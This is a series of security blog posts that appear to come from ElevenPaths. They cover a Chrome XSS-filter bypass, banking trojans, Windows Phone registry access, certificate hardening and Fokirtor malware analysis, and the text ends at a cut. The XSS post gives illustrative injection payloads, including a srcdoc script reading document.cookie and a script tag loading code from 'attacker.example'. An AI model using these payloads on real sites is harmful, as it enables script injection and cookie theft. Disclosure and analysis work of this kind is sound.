How to bypass antiXSS filter in Chrome and Safari (discovered by ElevenPaths)

Florence Broderick    20 January, 2014
Modern browsers usually have an anti-XSS filter that protects users from some of the consequences of this kind of attack. Normally, they block cross-site scripting execution, so the “injected” code (normally JavaScript or HTML) is not executed inside the victim’s browser. Chrome calls this filter XSSAuditor. Our coworker Ioseba Palop discovered a way to bypass it months ago. Since it is already resolved in the “main” version of Chrome, we are publishing the technical details now.

In ElevenPaths, we just found a way to evade the XSS filter in Chrome. This means that, if the victim visits a website with an XSS problem that an attacker is trying to take advantage of, the victim would not be fully protected. The bug is based on a misuse of the srcdoc attribute of the IFRAME tag, included in the HTML5 definition. To perform an XSS attack on the Google Chrome browser using this bug, the website must include an IFRAME and must be able to set any attribute of this element from HTTP parameters (GET/POST) without applying any charset filter. Then, in the IFRAME parameter, the srcdoc attribute may be injected with JavaScript code. Chrome cannot filter it, and the code will be executed.

To reproduce the PoC, there should be a webpage with some IFRAME tag like this:
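The original snippet was published as an image. A minimal page consistent with the description might look like this (the parameter name and the echoing mechanism are our own assumptions):

```html
<!-- Hypothetical vulnerable page: the value of the "src" HTTP parameter
     is echoed, unfiltered, into the IFRAME attributes -->
<iframe src="[value of the src parameter echoed here]"></iframe>
```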



And an HTML injection on the src parameter would be:
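The original injection was also shown as an image; an injection consistent with the description would close the src value and smuggle in a srcdoc attribute (the payload here is illustrative):

```html
<!-- Hypothetical injected value for the src parameter -->
x" srcdoc="<script>alert(document.cookie)</script>

<!-- Which would be reflected as: -->
<iframe src="x" srcdoc="<script>alert(document.cookie)</script>"></iframe>
```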



The XSS filter will then fail and let the script run.


Google forwarded this to the Chromium team, which does not treat these bypasses as a security problem, since XSSAuditor is considered a second line of defense.

The problem was reported on October 23rd. They fixed it two days later, making XSSAuditor catch reflected srcdoc properties even without an “IFRAME” tag injection. Chrome has just fixed it in the recent 32.0.1700.76 version.
Some other bug

A few weeks ago, in this post, someone took our PoC as an inspiration and developed another way of bypassing the filter. This one is still not fixed. The trick is to inject an opening “script” tag inside a parameter that is written directly into the HTTP response output stream, without any character filtering, just as in our case. For this to work, the page must contain content inside script tags that belongs to the web itself.



The browser will include our injection (remember, without closing the tag), ignore the “script” opening tag from the web itself, and use the web’s own closing tag to create a well-formed script and execute it… this is the bypass.
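The published example was an image; an illustrative reconstruction of the trick (URLs and surrounding markup are our own) would be:

```html
<!-- Before injection, the page reflects a parameter and, further down,
     contains its own script block: -->
<p>[reflected parameter]</p>
<script>var legit = true;</script>

<!-- Hypothetical injected value: an opening tag only, never closed -->
<script src="//attacker.example/evil.js">

<!-- After reflection, everything up to the page's own </script> becomes
     part of the injected element, so evil.js is fetched and executed: -->
<p><script src="//attacker.example/evil.js"></p>
<script>var legit = true;</script>
```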




Safari, still vulnerable

Safari for Mac and iPhone is vulnerable as well. They acknowledged our email and told us they were working on it. It seems they still are, since the browser is still vulnerable. Every time we have tried to contact them again, they reply that there is no news, but that they are working on it. Internet Explorer blocks it with its own filter, and Firefox does not implement an XSS filter of its own.

Banking trojan R&D: 64-bit versions and using TOR

Florence Broderick    8 January, 2014
The malware industry needs to improve to keep on stealing. So they research and invest. There are two different ways of investing if you are “in the business”: one is investing in new vulnerabilities so you can infect more efficiently. This is complex, and we will not talk about it in this post. The other is investing in how to steal more efficiently once the victim is infected. What have they done about it lately?
Which is the most lucrative banking trojan?
There are millions of banking trojans. More than you can probably imagine, and more than the antivirus companies can handle. But most of them have quite a lot in common: basically their targets (stealing, the more the better) and the way they break into a system and maintain the infection.

 

If we simplify a lot, the most lucrative banking trojan is the one we call “ZeuS” or “Zbot”, born in late 2005. ZeuS, depending on who you are talking to, is one thing or another. Its story is long enough to cover code leaks, mutations, copycats… For this article, ZeuS is basically a philosophy and a template. A “template” because it allows, with a program, to create a banking trojan targeting banks on demand, with its own syntax and some rules. A DIY kit with very advanced features. It is also a “philosophy” because of the way it steals, which may be considered a standard nowadays. ZeuS consolidated a style in banking trojans. What it does, and the basis of its success, is (among many more things):
  • It injects itself into the browser, so it can modify what the user actually sees on the screen. It injects new fields or messages, modifies the behavior, or sends the relevant data to the attacker.
  • If not injecting anything, it captures and sends all the outgoing HTTPS traffic to the attacker.
In this way, and with this basic structure, ZeuS (as a concept) has been alive and kicking for 8 years now. There is more malware with different names, but fundamentally they follow some of these style patterns.

Browser usage. The 64-bit Chrome version for Windows is under development. The 64-bit version of Firefox for Windows was even cancelled for a while.
What are they investing in?
ZeuS has evolved technically, but maintains the same basic structure. Is there an “official” ZeuS branch? Yes, you can buy it, but there are forks and other variants that became standard. Some features appear from time to time, and some groups of attackers adopt, copy or buy them.
Focusing on the latest changes, the most significant observed are: using TOR to communicate with Command and Control servers, and ZeuS compiled directly for 64 bits. Although not seen “in the wild”, this improves ZeuS capabilities dramatically.

One of the weak points (and advantages, in a way) of ZeuS (and malware in general these days) is that it strongly depends on external servers. Once these servers are down, the trojan becomes mostly useless. To solve this, so far they have used dynamic domains, random domain generators, fast flux playing with DNS, bulletproof hosting… All these techniques work, but they are expensive. Using TOR and .onion domains gives them “inexpensive” strength. Shutting down these servers will be very difficult for the good guys, and the infrastructure is easier for the attacker to maintain than any other “resilient” infrastructure used so far.

On the other hand, creating a 64-bit native version requires some clarification. Today, most Windows systems are 64-bit. On this architecture, 64-bit and (most) 32-bit applications (except drivers) can run without problems. That is why most programs today are compiled for 32 bits: they run on XP (whose 64-bit version was never widely used) and on any other Windows (mostly 64-bit). So developers create 32-bit versions for all of them to ease compatibility, and so does malware. Today, even on a 64-bit OS, browsers are still 32-bit (even IE, which comes in these two flavors in the latest Windows). The reason is compatibility with plugins and extensions that are still 32-bit. So, why create a 64-bit version of malware? Just because they can. They are maybe experimenting right now, for the near future. In fact, the 64-bit version has been detected “inside” a 32-bit version. This means that, once the machine is infected, it uses one or the other depending on the browser. They will find very few people using a 64-bit browser (reportedly only 0.01% of desktops use native 64-bit IE), but even that few is a market they do not want to give up, and when it grows (browsers are making efforts to ship native 64-bit versions, which will end up prevailing) they want their software to be ready.
There is maybe another reason. Using 64-bit versions makes them even more unnoticeable to sandboxes in antivirus companies. The sandbox is the first step in the detection circuit most AVs use: sandbox, and, if suspicious, deeper analysis and, if even more suspicious but not classified yet… manual analysis. XP is still widely used as a sandbox. A 64-bit version of malware will not work there, and will probably pass as a corrupted file. But this depends a lot on their resources and the way they work.
What do these changes mean?
That banking trojan developers do not fear users, and fear the AV companies just a little bit… Their only limitations are their own technical skills. If they want to, they can be even more proactive than any other industry. And they want the whole cake: every user, with every single nickel they have.
Sergio de los Santos

Accessing (and hacking) Windows Phone registry

Florence Broderick    30 December, 2013
Despite Microsoft’s efforts to secure Windows Phone 8 devices from community hacks, accessing the device’s registry is still possible, with some limitations. Writing to the registry is denied by default, but read permissions are quite lax.
First approach

When trying to read the registry, the initial approach is (maybe) to invoke a low-level library from the Win32 API, such as winreg.h, to import the necessary functions. However, PInvoke/DllImport isn’t available in Windows Phone, so we would have to implement it from scratch. Needless to say, this breaks Microsoft’s requirements for submitting such an application to the Store.
Doing some research shows that much work has already been done and is available for public download in the “XDA Developers” forum. There is a project called “Native Access” by GoodDayToDie that does exactly this. However, compiling and using it is not straightforward, so we’ll give it a go and show how to do it.

Dependencies

The project’s source code can be downloaded from the following link: http://forum.xda-developers.com/showthread.php?t=2393243. To get the referenced libraries needed for building the project, you need to convert the phone’s DLLs into .lib format (using, for example, dll2Lib, available from https://github.com/peterdn/dll2lib). The needed libraries are in the system32 directory, but using the emulator’s libraries will not work on an actual phone, so you will need an image from a real device. There are ISO files available “out there”, so you can get and extract them easily.

Once done, you need to place the extracted .LIBs in the Libraries folder of the WP8 SDK (typically in Program Files (x86)\Microsoft SDKs\Windows Phone\v8.0\Libraries).
Problems compiling

However, if you have trouble compiling the code, there’s a shortcut: reference the .winmd file from an existing project that uses Native Access (WebAccess, for example). Just extract the XAP’s contents (it is just a zip file) and search for “Registry.dll”, which is a precompiled version of the project.
Now we are ready to use the library and write code to search for some interesting keys in the registry. The class provides all of the necessary methods to access the registry: ReadDWORD, ReadString, ReadMultiString, ReadBinary, ReadQWORD, GetHKey, GetSubKeyNames, GetValues.

A real example

Here are the codes needed to access the different registry hives:

  • 80000000 -> HKEY_CLASSES_ROOT
  • 80000001 -> HKEY_CURRENT_USER
  • 80000002 -> HKEY_LOCAL_MACHINE
  • 80000003 -> HKEY_USERS
  • 80000004 -> HKEY_PERFORMANCE_DATA
  • 80000005 -> HKEY_CURRENT_CONFIG
Example code to access registry in Windows Phone 8
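The example code was originally published as an image. As an illustrative sketch only (the method names come from the Native Access class listed above, but the exact signatures and registry paths are our assumptions), reading keys could look something like this:

```csharp
// Illustrative only: signatures and registry paths are assumptions.
const uint HKLM = 0x80000002;  // HKEY_LOCAL_MACHINE, from the table above

// Enumerate subkeys under SOFTWARE and dump them to the debug console.
foreach (string name in Registry.GetSubKeyNames(HKLM, "SOFTWARE"))
{
    System.Diagnostics.Debug.WriteLine(name);
}

// Read a (hypothetical) string value from a subkey.
string vendor = Registry.ReadString(
    HKLM, @"SYSTEM\Platform\DeviceTargetingInfo", "PhoneManufacturer");
```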

For some registry locations that are highly sensitive, or for writing or creating keys, you need to add special Capabilities to your app. This requires an interop-unlock, which has currently been achieved only on Samsung devices, by taking advantage of Samsung’s “Diagnosis tool”.

Tero de la Rosa

FOCA Final Version, the ultimate FOCA

Florence Broderick    16 December, 2013
You all know FOCA. Over the years, it gained great acceptance and became quite popular. Eleven Paths has killed the FOCA to turn it into a professional service, FaasT. But FOCA did not die. FOCA Pro is now a portable version called FOCA Final Version that you can download for free.

FOCA Free vs. FOCA Pro
There used to be a FOCA Free and a FOCA Pro. The Pro version included some extra features, such as reporting, analysis of error messages in response pages, fuzzing of URLs searching for data type conversion errors in PHP, syntax errors in SQL/LDAP queries, integer overflow errors, and more parallelism in its core. It had no ads either.

But now FOCA is merged into just one version, based on FOCA Pro, but for free. So here it is: FOCA Final Version. This final version includes all the plugins available and the tools for you to create your own plugins. Some bugs reported by users have been fixed as well.

If you want to know how it works and some secrets, you can buy this new book about pentesting using FOCA.

FOCA Final Version
FOCA is free to download, with no registration, from the Eleven Paths Labs page.

Hope you enjoy it.

Latch, new ElevenPaths' service

Florence Broderick    12 December, 2013
During the time we’ve been working at ElevenPaths we’ve faced many kinds of events internally, but one of the most exciting and awaited is the birth of Latch. It’s a technology of our own that has been invented, patented and developed by our own team… and, at last, exhibited to the world. We’re proud of the work that has been done and we needed to talk about it. Finally we can do so. This is Latch.

We think that users do not use their digital services (online banking, email, social networks…) 24 hours a day. Why, then, would you allow an attacker to try to access them at any time? Latch is a technology that gives the user full control of his online identity, as well as better security for the service providers.

Latch, take control of when it’s possible to access your digital services.
Passwords, the oldest authentication system, are a security problem that we have to deal with every day. Second factors of authentication, biometrics, password managers… We haven’t yet found the ultimate solution that frees the user from depending on simple passwords, reusing them, or writing them on paper. Latch isn’t that solution, either. Even advanced users with good password practices are exposed to having their passwords stolen: malware that focuses on credential theft has been very “usual” for a long time. And even the most cautious users may have their passwords stolen by attackers if a third party’s database is hacked and exposed. Latch isn’t a solution for this problem, either.
Latch doesn’t replace passwords, but complements them and makes any authentication system stronger.

Latch’s approach is different. Avoiding authentication credentials ending up in the wrong hands is very difficult. However, it’s possible for the user to take control of his digital services and reduce the time that they are exposed to attacks. “Turn off” your access to email, credit cards, online transactions… when they’re not being used. Block them even when the passwords are known. Latch offers the user the possibility to decide when his accounts or certain services can be used. Not the provider and, of course, not the attacker.
Latch makes it possible to control your services even if an attacker has stolen the user’s password, credit card or any other authentication data, making it impossible for the attacker to use the stolen data in that service outside a defined time interval. In other words, (by just pushing a button) it’s possible to make the authentication credentials for any service valid only for the very moment when the user needs to introduce them into the system.

Latch’s scheme
Even though we’ve talked about passwords, Latch is actually a service to protect processes, defined by the service provider, for interacting with the end user. The background and uses that may be given to these processes are independent of the protection layer that Latch provides.
The main idea of this protection is limiting the exposure window that an attacker has for taking advantage of any of these processes. The user decides whether his service accounts are turned ON or OFF, and can even detail the actions that can be taken from those services. This makes it possible to reduce the time window of an attack, associating an external control with every operation. The service provider asks Latch for the user-defined status of a certain operation at a given time.
Latch’s general work scheme
In this figure, a client that tries to execute an operation from a service provider obtains confirmation on whether the operation has been allowed or denied.
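The flow in the figure can be sketched in a few lines of Python. This is only an illustration: the function names and the latch-status lookup are our own simplifications, not the real Latch SDK.

```python
# Sketch of a provider-side check: the latch state is consulted in
# addition to the password, so a stolen password alone is not enough.
def latch_status(account_id: str, operation: str, latches: dict) -> str:
    """Return the user-defined state ('on' or 'off') for an operation."""
    return latches.get((account_id, operation), "on")  # default: allowed

def try_login(account_id: str, password_ok: bool, latches: dict) -> bool:
    if not password_ok:
        return False
    # Deny the operation while the user keeps the latch switched off.
    return latch_status(account_id, "login", latches) == "on"

latches = {("alice", "login"): "off"}      # Alice switched her login off
print(try_login("alice", True, latches))   # False: blocked despite password
print(try_login("bob", True, latches))     # True: no latch set
```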

The configuration of an operation’s state is made through an alternative channel (considered more “secure” than the regular device), so any attempt to access an operation blocked by the user may be identified as an anomaly. Such an anomaly could imply that the user trying to access the blocked operation is not really who he claims to be, so a possible fraud attempt is identified.

How it works in practice
The user will only need a smartphone to “activate” or “deactivate” the services paired with Latch. To do so, he or she will need to:
  • Create a Latch user account. This account will be the one the user employs to configure the state of the operations (setting his service accounts to ON or OFF).
  • Pair the usual account with the service provider (an email account or a blog, for example) that the user wants to control. This step allows Latch to synchronize with the service provider and to give the adequate responses (defined by the user) depending on which operation is attempted. The service provider must be compatible with Latch, of course. This allows the users to decide whether to use Latch or not. Latch is offered, not imposed.

Latch for the service providers

Latch allows the users to control access to their services, and to accomplish this, the service providers need to integrate Latch into their systems. We’ve programmed different SDKs in many languages (.NET, PHP, ASP…) and we’ve created plugins for existing platforms such as WordPress, PrestaShop, Drupal and Joomla. The webpages using these platforms are able to offer Latch to their users quite easily… so the users deciding to use the service may take advantage of Latch just as easily.


The integration is easy and straightforward, giving the service provider a great opportunity to improve the security offered to its users, and therefore, their online identity.

And that is not all…

Latch offers more ways to protect users, their credentials, online services and online identities. We will introduce them soon. Stay tuned.

EmetRules: The tool to create "Pin Rules" in EMET

Florence Broderick    6 December, 2013
EMET, the Microsoft tool, introduced in its 4.0 version the chance to pin root certificates to domains, only in Internet Explorer. Although useful and necessary, the ability to associate domains with certificates does not seem to be much used nowadays. It may be hard to set up and use… We have tried to fix that with EmetRules.

To pin a domain with EMET it is necessary to:
  • Check the certificate in that domain
  • Check its root certificate
  • Check its thumbprint
  • Create the rule locating the certificate in the store
  • Pin the domain with its rule

Steps are summarized in this figure:


It is quite a tedious process, even more so if your target is to pin a big number of domains at once. In Eleven Paths we have studied how EMET works and created EmetRules, a little command-line tool that allows you to complete all the work in just one step. Besides, it allows batch work. It will connect to the domain or list indicated, visit port 443, extract the SubjectKey from the root certificate, validate the certificate chain, create the rule in EMET and pin it to the domain. All in one step.
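The per-domain legwork can be sketched in a few lines of Python. This is only an outline of the first steps (fetching the certificate presented on port 443 and computing a thumbprint), not EmetRules itself: EmetRules extracts the SubjectKey of the root certificate, and building the final EMET rule XML is omitted here.

```python
import hashlib
import ssl

def thumbprint(der_bytes: bytes) -> str:
    """SHA1 thumbprint (hex) of a DER-encoded certificate."""
    return hashlib.sha1(der_bytes).hexdigest()

def fetch_cert_der(domain: str, port: int = 443) -> bytes:
    """Fetch the server certificate presented on the TLS port, as DER."""
    pem = ssl.get_server_certificate((domain, port))
    return ssl.PEM_cert_to_DER_cert(pem)

# Usage: thumbprint(fetch_cert_der("www.example.com"))
```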

EmetRules, by ElevenPaths

The way it works is simple. The tool needs a list of domains, and will create the corresponding XML file, ready to be imported into EMET, even from the tool itself (command line).

Some options are:

Parameters:
  • “urls.txt” is a file containing the domains, separated by “\n”. Domains may have “www” in them or not. If not, EMET will try both, unless stated otherwise with the “d” option (see below).

  • “output.xml” specifies the path and filename of the output file where the XML config file that EMET needs will be created. If it already exists, the program will ask whether it should overwrite it, unless stated otherwise with the “-s” option (see below).

Options:

  • “t|timeout=X”. Sets the timeout in milliseconds for the request. Between 500 and 1000 is recommended, but it depends on the threads used. 0 (the default) stands for no timeout; in that case, the program will keep trying the connection until it expires.
  • “s”, silent mode. No output is generated and no question is asked. Once finished, it will not ask whether you wish to import the generated XML into EMET.
  • “e”. This option will generate a TXT file named “error.txt” listing the domains that produced any error during connection. This list may be used again as an input for the program.
  • “d”. This option disables double checking, that is, trying to connect to both the main domain and the “www” subdomain. Without it, if the domain in “urls.txt” includes “www”, only that one is contacted; if not, both are. With this option, only the domain as listed will be contacted.
  • “c|concurrency=X”. Sets the number of threads the program will run with. 8 is recommended. By default, only one will be used.
  • “u”. Every time the program runs, it contacts central servers to check for a new version. This option disables that check.

The tool is intended mainly for admins or power users who use Internet Explorer and want to receive an alert when a connection to a domain is suspected of being “altered”. The pinning system in EMET is far from perfect, and even the warning displayed is very shy (it allows the user to get to the suspected site), but we think it is the first step towards what will be, for sure, an improved feature in the future.


We encourage you to use it.

December 12th: Innovation Day in Eleven Paths

Florence Broderick    29 November, 2013

On December 12th, 2013, in Madrid, Eleven Paths will come out into society in an event we have named Innovation Day. In this event Eleven Paths will introduce old and new services, besides some surprises. Registration, from this web, is necessary to attend.

Eleven Paths started working inside Telefónica Digital six months ago. After quite a lot of hard work, it is time to show part of the effort we have been through during this time. Besides Eleven Paths, Telefónica de España and the Security Vertical of Telefónica Digital will present their products and services as well on this Innovation Day.

We will talk about Telefónica CiberSecurity services, Faast, the MetaShield Protector family of products, Saqqara, anti-APT services… and, finally, about a project that has remained secret so far, dubbed “Path 2” internally. From December 12th on, this technology will be revealed step by step. For Eleven Paths, it has been a real challenge to develop it during this period. But right now, it is a reality. It is already integrated in several sites and patented at world level.

Clients, security professionals and systems administrators… they are all invited. The event will take place on Thursday, December 12th, during the afternoon (from 16:00) in the Auditorio central building of the Distrito Telefónica campus in Madrid. Besides announcing all this exciting technology, we will enjoy live music concerts. Finally, there will be a great party, thanks to all the security partners in Telefónica.

Registration is limited, so a pre-registration form is available. Once filled in, a confirmation email will be sent (if it is still possible to attend).

The "cryptographic race" between Microsoft and Google

Florence Broderick    21 November, 2013
Google and Microsoft are taking bold steps forward to improve the security of cryptography in general and TLS / SSL in particular, raising standards in protocols and certificates. In a scenario as reactive as the security world, these movements are surprising. Of course, these are not altruistic gestures (they improve their image in the eyes of potential customers, among other things). But in practice, are these movements useful?
Google: what have they done
Google announced months ago that it was going to improve security in certificates, using 2048-bit RSA keys as a minimum. They have finished earlier than they expected. They want to remove 1024-bit certificates from the industry before 2014 and create all of them with 2048-bit key length from now on. Quite optimistic, bearing in mind that 1024-bit certificates are still widely used. Beginning in 2014, Chrome will warn users when certificates do not match these requisites. Raising the key length to 2048 bits in certificates means that trying to break the cipher by brute force becomes less practical with current technology.
Besides, related to this effort towards encrypted communications, since October 2011 Google encrypts traffic for logged-in users. Last September, it started to do it in every single search. Google is trying as well to establish “certificate pinning” and HSTS to stop man-in-the-middle certificates when browsing the web. If that wasn’t enough, their Certificate Transparency project goes on.

It seems Google is particularly worried about its users’ security and, specifically (although it may sound funny to many of us), about their privacy. In fact, they assert that “the deprecation of 1024-bit RSA is an industry-wide effort that we’re happy to support, particularly in light of concerns about overbroad government surveillance and other forms of unwanted intrusion”.
Microsoft: what have they done
With the latest Microsoft update, important measures to improve cryptography in Windows were announced. In the first place, it will no longer support RC4, very weak by now (it was created in 1987) and responsible for quite a lot of attacks. Microsoft is introducing tools to disable it in all its systems and wants to eradicate it soon from every single program. In fact, in Windows 8.1 with Internet Explorer 11, the default TLS version is raised to TLS 1.2 (which is able to use AES-GCM instead of RC4). Besides, this protocol also usually uses SHA2.

Another change in certificates is that it will no longer allow hashing with SHA1 for certificates used in SSL or code signing. SHA1 is an algorithm that produces a 160-bit output, and it is used when generating RSA certificates to hash the certificate contents. This hash is then signed by the Certificate Authority, showing its trust this way. It has been a while since NIST encouraged everyone to stop using SHA1, but few cared about that claim. It looks like quite a proactive move from Microsoft, which got us used to an exasperatingly reactive behavior.
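As a quick reminder of the sizes involved, the output lengths of SHA1 and the usual SHA2 variant can be checked in a few lines of Python:

```python
import hashlib

# SHA1 produces a 160-bit digest; SHA-256 (the usual SHA2 variant found
# in certificates as "sha256RSA") produces a 256-bit digest.
sha1 = hashlib.sha1(b"certificate bytes").digest()
sha256 = hashlib.sha256(b"certificate bytes").digest()

print(len(sha1) * 8)    # 160
print(len(sha256) * 8)  # 256
```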
Why all this? Is this useful?

Microsoft and Google are determined to improve cryptography in general and TLS/SSL in particular. With these measures adopted between the two of them, the security of the way traffic is encrypted is substantially raised.
A 2048-bit certificate using SHA2 (SHA256).
Certificates that identify public keys calculated with 512-bit RSA keys were broken in practice in 2011. In 2010, a 768-bit number (232 digits) was factored with a general-purpose algorithm in a distributed way; the largest known so far. So, in practice, using a 1024-bit number is “safe” today, although it can be discussed whether it represents a threat in the near future. Google is playing it safe.

But there are some other problems to focus on. Using stronger certificates in SSL is not the main obstacle for users. In fact, introducing new warnings (Chrome will warn about 1024-bit certificates) may just make the user even more confused: “What does using 1024 bits mean? Is it safe or not? Is this the right place? What decision should I take?“. Too many warnings just relax security (“which is the right warning, when I am warned about both safe and unsafe sites?”). The problem with SSL is that it’s socially broken, and not understood… not from the technical standpoint but from the users’. Users will be happy that their browser of choice uses stronger cryptography (so the NSA can’t spy on them…), but it will be useless if, confused, they accept an invalid certificate when browsing, not being aware that they are introducing a man-in-the-middle.

If we adopt the theory that the NSA is able to break into communications because it already has adequate technology to brute-force 1024-bit certificates, this is very useful. There would be a problem if it wasn’t necessary to break or brute-force anything at all, because the companies were already cooperating to give the NSA plain-text traffic… We could dismiss the idea that the NSA already has its own advanced systems ready to break 2048-bit keys, and that is why they “allow” its standardization… couldn’t we? We just have to look back a few years to remember some conspiracy tales like these in the world of SSL.
Self-signed certificate created in Windows 8, using MD5 and 1024 bits.
The case of Microsoft is funny, too. Obviously, this movement in certificates is motivated by TheFlame. Using MD5 with RSA played a bad trick on them, allowing the attackers to sign code in Microsoft’s name. It can’t happen again. This puts Microsoft ahead in deprecating SHA1 for certificates; the industry will follow. But while RC4 is really broken, SHA1’s health is not that bad. We have just started getting rid of MD5 in some certificates, and Microsoft is already proclaiming the death of SHA1. This leaves us with just the possibility of using SHA2 (sha256RSA or sha256withRSAEncryption normally in certificates, although SHA2 allows outputs from 224 to 512 bits). It’s the right moment, because XP is dying, and SHA2 wasn’t even natively supported there (only from Service Pack 3 on). There is still a lot of work to be done, because SHA1 is very widespread (Windows 7 signs most of its binaries with SHA1; Windows 8, with SHA2); that is why the deadline is 2016 for signing certificates and 2017 for SSL certificates. How the Certification Authorities will react… is still unknown.
On the other hand, regarding the use of mandatory TLS 1.2 (related in a way, because it’s the protocol supporting SHA2), we have to be aware of the recent attacks against SSL to know what it’s really trying to solve. Very briefly:
  • BEAST, in 2011. The problem was based on CBC and RC4. It was really solved with TLS 1.1 and 1.2, but both sides (server and browser) have to support those versions.
  • CRIME: This attack allows an attacker to retrieve cookies if TLS compression is used. Disabling TLS compression solves the problem.
  • BREACH: Allows retrieving cookies, but it is based on HTTP compression, not TLS compression, so it cannot be “disabled” from the browser. One is vulnerable whatever TLS version is being used.
  • Lucky 13: Solved mainly in software, and in TLS 1.2.
  • TIME: A CRIME evolution. It doesn’t require the attacker to be in the middle, just JavaScript. It’s a problem in browsers, not in TLS itself.
A still very common certificate, using SHA1withRSAEncryption and 1024-bit keys.
We are not aware of these attacks being used in the wild by attackers. Imposing TLS 1.2 without RC4 is a necessary movement, but still risky. Internet Explorer (until version 10) supports TLS 1.2 but it is disabled by default (only Safari enables it by default, and the others have just started to implement it). Version 11 will enable it by default. Servers have to support TLS 1.2 too, so we don’t know how they will react.
To summarize, it looks like these measures will bring technical security (at least in the long term). Even if there are self-interests to satisfy (avoiding problems they already had) and an image to improve (leading the “cryptographic race”), any enhancement is welcome, and this “war” to lead cryptography (which fundamentally means being more proactive than your competitors) will raise the bar.
Sergio de los Santos

Fokirtor, a sophisticated(?) malware for Linux

Florence Broderick    18 November, 2013
Symantec has just released some details about how a new malware for Linux works. It is relevant for its relative sophistication. It was discovered in June as a fundamental part of a targeted attack against a hosting provider, but it’s only now that they have disclosed technical details about how it works. Although sophisticated for a Linux environment, technically it’s not so relevant if we compare it with malware for Windows.

In May 2013, an important hosting provider was attacked. The attackers knew exactly what they were doing and what mistakes to avoid. They wanted financial data and user passwords (which, as it happens, were stored encrypted, though it cannot be ruled out that the master key was compromised…). This happens every day; the difference is the method used: Fokirtor, the name Symantec has given to the trojan used as the attack tool.

It was a fairly important company and they needed to evade its security systems, so they tried to go unnoticed by injecting the trojan into a server process such as the SSH daemon. In this way they disguised their presence both physically (no new processes were needed) and in the traffic (which blended with the traffic generated by the SSH service itself). This is a “standard” method in Windows malware, where regular trojans usually inject themselves into the browser and hide their traffic inside HTTP.


Of course, the malware needed connectivity with the outside world to receive commands. In the Windows world, malware usually connects outbound periodically (to elude inbound firewalls) towards a C&C over HTTP. In the case of Fokirtor, it hooked functions and waited for commands injected into the SSH process, preceded by the characters ”:!;.“ (without quotes). This would indicate that the attacker wanted to perform some action. The method isn’t new. Usually, when some legitimate piece of software is trojanized in the Linux world, code that reacts to a certain pattern is embedded in it, and it is then published so that future victims download it. What isn’t so usual is to do it “on the fly” by injecting into a running process. Although the news doesn’t make it clear, we understand the attacker had to obtain root privileges on the compromised machine.

The attacker just had to connect via SSH to the servers and send the magic sequence to take over the machine. Received commands were encoded in base64 and encrypted with Blowfish (designed by Bruce Schneier in 1993). This traffic wasn’t logged.
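The command channel described above (a magic prefix followed by an encoded payload inside otherwise normal SSH traffic) can be sketched roughly as follows. The magic bytes come from Symantec’s report; the function name is ours, and the Blowfish layer is deliberately omitted here, so payloads are treated as plain base64 purely for illustration:

```python
import base64

MAGIC = b":!;."  # prefix reported by Symantec (without quotes)

def extract_commands(stream: bytes) -> list:
    """Scan a captured byte stream for magic-prefixed payloads.

    Each payload is assumed to run from the magic prefix to the next
    newline and to be base64-encoded. The real trojan added a Blowfish
    encryption layer, not reproduced in this sketch.
    """
    commands = []
    idx = 0
    while True:
        idx = stream.find(MAGIC, idx)
        if idx == -1:
            return commands
        start = idx + len(MAGIC)
        end = stream.find(b"\n", start)
        if end == -1:
            end = len(stream)
        token = stream[start:end].strip()
        try:
            commands.append(base64.b64decode(token, validate=True))
        except ValueError:
            pass  # malformed payload; ignore and keep scanning
        idx = end
```

A scanner like this is also, conceptually, what a detection rule for the trojan’s traffic would look for: the fixed prefix inside an SSH session.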
Sophisticated?
In absolute terms, it is technically below “standard” Windows malware, and light years behind professional malware used as “cyberweapons” (The Flame, Stuxnet, etc.). Nevertheless, it does represent an interesting milestone that doesn’t happen often: specific malware for Linux servers that actively seeks to go unnoticed.

To recall similar news, we have to go back a year. A user sent an email to the “Full Disclosure” security list, stating he had found his Debian servers infected with what seemed to be a “rootkit working with nginx”. It was an administrator who had realized that visitors to his website were being redirected to infected sites. Certain kinds of requests to that web server returned an iframe injected into the page, which led to a site that tried to infect Windows users. The administrator discovered some hidden processes and kernel modules responsible for the problem, and attached them to the email so they could be studied. After they were analyzed, we didn’t hear much more about that rootkit.

Some questions without answers

Something that catches the eye but doesn’t seem to have an explanation is that Symantec detected this malware in June, under the same name, but hasn’t offered technical details about how it works until now. What happened during these five months? They have probably been studying it in cooperation with the affected company. Unless they ran into administrative or legal problems, technically it isn’t necessary to spend so much time analyzing malware like this. And what happened before June? The attack was detected in May, but nothing is said about how long the company had been infected. It would be interesting to know how successful its hiding strategy was during a real infection period. Being a hosting provider, were their customers’ webpages compromised?


They say nothing about the trojan being able to replicate itself, or about it being detected on any other system. Possibly it was a targeted attack on a specific company, and the attackers didn’t add that functionality to their tool: just what was strictly necessary to accomplish their task.

Although we instinctively associate the malware world with Windows systems, when attackers have a clear target there are no barriers, whatever the operating system; if anything, the barriers are even weaker. Do not forget that malware, technically speaking, is just a program “like any other”, and only the will to write it separates it from becoming a reality on a specific platform.
Sergio de los Santos

Responsible full disclosure… on both sides

Florence Broderick    13 November, 2013


Responsible disclosure of vulnerabilities is an old debate, but not necessarily a settled one. Let’s look at it from the point of view of the vulnerable or affected party, not the researcher (who is usually the one held to account). If responsible disclosure is to be practiced, the adjective should apply both to the one who finds the flaw and to the one affected by it.
The anecdote
At ElevenPaths, a few weeks ago we reported a small flaw on Cisco’s website, specifically in its Meraki cloud networking service. A particular path disclosed potentially sensitive information.
Among other things, it showed the SSH username, the SVN server, paths on the internal network, and other SVN usernames. The data may not be up to date and its impact may be minimal, but it is information that definitely should not be there.
In its program, under these conditions, Cisco sets out the rules for reporting security flaws:
 

We take these reports seriously and will respond swiftly to fix verifiable security issues. […] Any Cisco Meraki web service that handles reasonably sensitive user data is intended to be in scope. This includes virtually all the content under *.meraki.com. […] It is difficult to provide a definitive list of bugs that will qualify for a reward: any bug that substantially affects the confidentiality or integrity of user data is likely to be in scope for the program.

 

The information disclosure was reported to them in early November. Two days later, Meraki’s response was worse than expected:

I have looked into your report and, unfortunately, this was first reported to us on 9/23/13, with a resolution still pending from our engineers.

This means they claimed a third party had discovered it earlier and, worse, that the problem had been known to them for at least five weeks and they still had not fixed it (and still haven’t). It is simply a matter of removing a page from a server or protecting it with a password.

Other problems and vulnerabilities discovered by our team, considerably more complex, have been resolved in much less time. Problems that can be settled by removing a page are usually fixed the very day they are detected.

With all due caveats, other users who have taken part in the bounty programs of Facebook, PayPal (particularly clumsy with its program) or Google complain that, on “too many” occasions, they received the answer that someone had already reported the issue. One even claims that when he asked PayPal for proof that someone had beaten him to it, they never answered. It is even more common to hear that vendors take too long to fix any flaw when it is reported privately.

Background

